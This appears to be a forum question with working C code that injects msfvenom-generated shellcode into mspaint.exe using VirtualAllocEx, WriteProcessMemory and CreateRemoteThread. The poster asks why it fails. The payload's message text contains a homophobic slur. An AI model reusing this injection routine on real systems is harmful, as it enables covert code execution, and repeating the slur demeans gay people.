Threat is not executing
#include <Windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <tchar.h>

int main(int argc, char **argv){

    unsigned char shellcode[] =
        "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
        "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
        "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
        "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
        "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
        "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
        "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
        "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
        "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
        "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
        "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
        "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
        "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
        "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
        "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x3e\x48"
        "\x8d\x8d\x1a\x01\x00\x00\x41\xba\x4c\x77\x26\x07\xff\xd5"
        "\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x0e\x01\x00"
        "\x00\x3e\x4c\x8d\x85\x16\x01\x00\x00\x48\x31\xc9\x41\xba"
        "\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2"
        "\x56\xff\xd5\x6d\x61\x72\x69\x63\x6f\x6e\x00\x47\x61\x79"
        "\x00\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00";

    PROCESSENTRY32 pe32;

    pe32.dwSize = sizeof(PROCESSENTRY32);

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    Process32First(snapshot, &pe32);

    do {

        if (lstrcmp(pe32.szExeFile, TEXT("mspaint.exe")) == 0) {

            HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);

            LPVOID allocated_mem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

            if (allocated_mem == NULL){
                printf("Memory allocation failed: %u\n", GetLastError());
                return 1;
            }

            printf("Memory page allocated at: 0x%p\n", allocated_mem);

            WriteProcessMemory(hProcess, allocated_mem, shellcode, sizeof(shellcode), NULL);

            HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocated_mem, NULL, 0, NULL);

            if (hThread == NULL){
                printf("Failed to obtain handle to process: %u\n", GetLastError());
                return 1;
            }

            WaitForSingleObject(hThread, INFINITE);

            VirtualFreeEx(hThread, allocated_mem, 0, MEM_RELEASE);

            CloseHandle(hThread);

            CloseHandle(hProcess);

            break;

        } 

    } while(Process32Next(snapshot, &pe32));

    return 0;
}

I am trying to inject shellcode that contains a messagebox into mspaint.exe process. The shellcode is propperly writed in the process memmory but it is not executing and I do not know why.
I am using this command to generate the code msfvenom -p windows/x64/messagebox TEXT="maricon" TITLE="Gay" -f c -a x64.
I am executing it in a Windows machine. And GetLastError() is returning 5.
The shellcode is suppose to generate a messagebox.
